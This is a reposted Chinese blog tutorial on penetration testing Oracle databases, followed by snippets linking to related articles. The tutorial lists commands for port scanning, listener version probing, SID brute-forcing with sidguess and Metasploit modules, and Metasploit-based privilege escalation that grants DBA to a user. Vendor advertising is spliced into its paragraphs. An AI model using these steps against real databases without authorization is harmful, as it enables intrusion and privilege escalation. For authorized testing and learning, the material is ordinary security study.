oracle数据库的渗透测试

最新推荐文章于 2024-01-10 09:45:00 发布
最新推荐文章于 2024-01-10 09:45:00 发布
阅读量2.6k 收藏 4
点赞数
文章标签: oracle 渗透测试

一、数据库端口的安全扫描

 

首先检测数据库端口的的开放使用namp命令来对目标数据库IP进行端口扫描,命令

如下:nmap -Pn -n -T4 --open -p1521

二、数据库的版本相关信息

 

再来检查下数据库的版本信息,得到一个存活的oracle数据库服务端口,了解数据库的版本信息非
常关键,针对不同的版本会有不一样的测试方式,有不同的安全漏洞,需要不同的poc来对其进行测试,所以在测试之前首先要了解数据库的版本,下面说几个方法。Sine安全公司是一家专注于:
服务器安全、网站安全、网站安全检测、网站漏洞修复,渗透测试,安全服务于一体的网络安全服务提供商。

利用msf工具进行判断,使用如下模块来对数据库进行版本探测:

msf > use auxiliary/scanner/oracle/tnslsnr_version

使用tnscmd10g工具,命令如下:

tnscmd10g version -h <target IP>

tnscmd10g status -h <target IP>

通过以上两种方法,以及命令可以得到版本信息、日志文件、跟踪信息以及端口相关的安全渗透信息。

三、获取数据库的SID安全值

 

再来获取数据库的SID值,连接oracle数据库不仅仅需要账号密码,而且还需要SIDSID是一个数据库的唯一标识符!是建立一个数据库时系统自动赋予的一个初始ID),所以如何获取SID是非常关键的,可以使用以下方法获取:

使用sidguesssidguesskali下的一款爆破Oracle SID的工具,命令如下:

sidguess -i <target IP> -d /home/myh0st/pass.txt

msf下有两个模块可以完成这个操作,命令如下:
 msf > use auxiliary/scanner/oracle/sid_enum
 msf > use auxiliary/admin/oracle/sid_brute

 如果oracle的版本为10g,默认通过8080端口,远程管理的可以访问以下路径:
 http://127.0.0.1:8080/oradb/PUBLIC/GLOBAL_NAME

 四、数据库提权
 

使用sql命令提权,在获取到数据库登录口令后,如何对数据库进行提权操作?可以使用msf下的两个模块,命令如下:Sine安全公司是一家专注于:服务器安全、网站安全、网站安全检测、网站漏洞修复,渗透测试,安全服务于一体的网络安全服务提供商。

 msf > use auxiliary/admin/oracle/sql

   set DBUSER <user>

   set DBPASS <password>

   set SID <sid>

   set SQL select * from user_role_privs

 msf > use auxiliary/admin/oracle/pushin/lt_findricset_cursor

   set DBUSER <user>

   set DBPASS <password>

   set SID <sid>

   set SQL GRANT DBA TO <user>

   set SQL GRANT JAVASYSPRIV TO <user>

 查询数据库版本:

 select * from v$version;       

数据库打补丁情况:

 select * from dba_registry_history;

 查看所有用户:

 select * from all_users;

 查询数据库中的所有表:

 select owner,table_name from all_tables;

本文转载自-https://www.sinesafe.com/article/20171024/oracle.html

爱上卿Ooo
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web渗透--35--Padding Oracle攻击
武天旭的博客
09-21 2730
1、漏洞描述: Padding Oracle攻击指应用在解密客户端提交的加密数据时,泄露了解密数据的分段填充是否合法的信息。攻击者利用Padding Oracle可以在不知道加密程序所使用的密钥的情况下,解密数据或者加密任意数据。即使应用程序确认加密数据的完整性,仍会导致该程序仍有敏感数据泄露和越权漏洞的风险。 密文在被解密时,会被分成若干个数据块,每个数据块有固定的长度,常见的加密算法大多为8字...
oracle的shell命令,Oracle 存储过程执行 shell 命令
weixin_35949435的博客
04-02 810
说明:通过调用存储过程传入一个shell命令,然后执行命令。存储过程调用java代码,java代码执行shell命令1.编写 java 代码 ,文件名 A.javaimport java.io.BufferedReader;import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReade...
渗透测试之地基服务篇:服务攻防之数据库Oracle(上)
m0_59598029的博客
07-31 155
渗透测试-地基篇该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用KaliLinux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!
78.网络安全渗透测试—[SQL注入篇17]—[Oracle+JSP-联合查询注入]
qwsn
01-20 2367
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、Oracle+JSP 联合查询注入 1、注释符号 2、手工闭合方法 3、判断是否存在注入 3、判断列数:order by二分法排序` 4、联合查询:判断回显位 5、联合查询:获取Oracle的系统级信息 6、联合查询:库名、表名、字段名 7、联合查询:数据/记录/字段值 8、Oracle的常用SQL语句 9、总结:
20154319 实验五 MSF基础应用
weixin_30755709的博客
04-18 173
一、实验内容 (1)一个主动攻击,如ms08_067; (2) 一个针对浏览器的攻击,如ms11_050; (3)一个针对客户端的攻击,如Adobe; (4)成功应用任何一个辅助模块。 二、实验后问题回答 (1)用自己的话解释什么是exploit,payload,encode。 Exploit就是漏洞利用,有exploit肯定有漏洞,所以渗透攻击就是利用一个系统、应用或服务中的...
oracle测试数据库搭建
zgl、荒的博客
09-17 3649
系统参数 主机:testdb    IP:192.168.2.1 选择备份:/backup/databk/full* 目的:检测EMR数据库rman备份是否有效   恢复步骤 删除测试库上的oracle实例 关闭testdb上的旧数据库,删除与其相关的测试库数据 删除之前的实例his,确保恢复时不会发生冲突。       从生产环境把备份拷贝到测试环境 在生成环境上拷贝所有的备份...
Oracle数据库性能测试
qq_37106538的博客
12-21 1864
一、复制oracle的JDBC驱动JAR包文件---ojdbc6.jar到JMeter的lib目录下。 oracle目录如下,一般在jdbc/lib下 复制到JMeter 的lib目录下 二、bin目录启动jmeter.bat,测试计划下新增线程组 测试计划——右键——添加——线程——线程组 设置线程数5,循环次数10,即总计50次请求 三、线程组下新增JDBC连接池配置 线程组右键——添加——配置原件——JDBC Connection Configuration 配置数据库..
Oracle-Pentesting-Reference:Oracle数据库渗透测试参考(10g11g)
04-28
Oracle数据库渗透测试参考(10g / 11g) Kali Linux环境设置/附加组件: 1.获得Kali Linux Oracle支持 2.安装SQL Developer 3.在Kali Linux上安装Oracle DB XE 11G客户端。 4.在/ etc / profile中设置环境...
数据库oracle之增删改查详细学习.pdf
11-16
学习 Oracle 数据库的基础知识对于后期渗透测试数据库应用开发非常重要。本文将详细介绍 Oracle 数据库的增删改查操作,包括创建表、添加数据、修改数据、删除数据、删除表等操作。 一、创建创建表是 Oracle ...
渗透测试之信息收集1
08-04
渗透测试之信息收集1 渗透测试中,信息收集是非常重要的一步骤,因为只有我们掌握了目标网站或目标主机足够多的信息之后,我们才能更好地对其进行漏洞检测。 信息收集可以分为两种方式:主动和被动。主动信息收集...
sqlmap 渗透测试工具
最新发布
04-16
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBM DB2、SQLite等数据库...
sql开源渗透测试工具.rar
02-16
在IT安全领域,SQL(Structured Query Language)渗透测试是一项至关重要的任务,用于识别和修复数据库系统中的漏洞。本文将深入探讨“sql开源渗透测试工具”的相关知识点,包括这些工具的功能、工作原理以及如何...
oracle数据库系统加固规范.doc
03-01
- 定期进行安全审计和渗透测试,以发现潜在弱点。 以上所述是Oracle数据库系统加固规范中的核心概念,这些措施有助于保护数据库免受恶意攻击,确保数据的机密性、完整性和可用性。在实际操作中,应结合具体环境和...
web渗透测试技巧(下)
10-12
### Web渗透测试技巧(下) #### SQL Injection SQL注入是一种常见的Web应用安全漏洞,攻击者通过将恶意SQL代码插入到应用程序的输入字段中,从而控制数据库执行非授权操作。根据不同的利用方式,SQL注入可以分为...
渗透测试必备神器SQLMAP的所有绕waf脚本合集
10-18
SQLMAP是一款开源的自动化渗透测试工具,专门用于检测和利用SQL注入漏洞。它以其高效、智能化的特点,在网络安全领域中备受青睐。SQL注入攻击是黑客利用应用程序处理用户输入时的疏忽,将恶意的SQL代码注入到查询...
wodat:一款针对Windows Oracle数据库渗透测试工具
瓦罗兰特顶级C位的博客
01-10 850
wodat是一款功能强大的针对Windows Oracle数据库渗透测试工具,该工具基于C# .Net Framework开发,能够帮助广大研究人员对Windows平台下的Oracle数据库执行按摩全渗透测试任务。
数据库渗透测试基础(识别与SQL操作)
Hardworking666的博客
04-14 985
文章目录一、识别数据库1、数据库默认端口号2、报错信息3、各数据库的版本查询方法区别4、各数据库在字符串处理时的区别二、SQL语法基础1、命令分类2、SQL操作 一、识别数据库 1、数据库默认端口号 ➢ Oracle:1521 ➢ MySQL:3306 ➢ SQL Ser ver:1433 ➢ PostgreSQL:5432 ➢ mongoDB:27017 ➢ Redis:6379 ➢ MemcacheDB:11211 2、报错信息 3、各数据库的版本查询方法区别 ➢ MSSQL select @@ve
8-2 MSF暴力破解SID和检测Oracle漏洞
weixin_43263566的博客
11-05 746
当我们发现 Oracle 数据库的 1521 端口时,我们可能考虑使用爆破 SID(System Identifier)来进行进一步的探测和认证。在 Oracle 中,SID 是一个数据库的唯一标识符。当用户希望远程连接 Oracle 数据库时,需要了解以下几个要素:SID、用户名、密码以及服务器的 IP 地址。请注意,在进行任何安全测试之前,请确保已经获得合法的授权,并且仅限于您拥有权限的系统。此外,强烈建议在测试中遵循道德规范和法律准则,以确保不会对他人的隐私和安全造成负面影响。3)查看可配置选项。
Oracle2021 年度安全警告,8 个安全漏洞需要注意
极客日报
01-20 2875
| 快讯 Oracle 公司 于 2021 年 1 月 19 日,发布了第一个年度安全预警。其中,有 8 个安全警告和 Oracle 数据库部分有关。目前,可以通过最新的 CPU 补丁,可以修复这个安全漏洞。 以下是这 8 个安全漏洞: CVE-2021-2018 该漏洞无需身份验证即可远程利用,入侵者可以通过网络利用这些漏洞并且不需要用户凭据。给出的安全系数风险评分是 8.3 分。不过,此攻击复杂度较高,也只影响 Windows 平台 CVE-2021-2035 被通过数据库的Scheduler
msf攻击oracle数据库
09-06
根据您提供的引用内容,可以得出以下结论:Metasploit框架提供了用于渗透测试的一些辅助模块,其中包括针对MySQL数据库的模块。您可以使用这些模块来测试MySQL服务器的漏洞并进行渗透攻击。然而,关于MSF攻击Oracle数据库的具体信息,并未在提供的引用内容中找到相关信息。因此,我无法提供有关MSF攻击Oracle数据库的详细步骤。如果您有更多的引用内容或其他相关信息,请提供给我,我将尽力给出更详细的答案。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值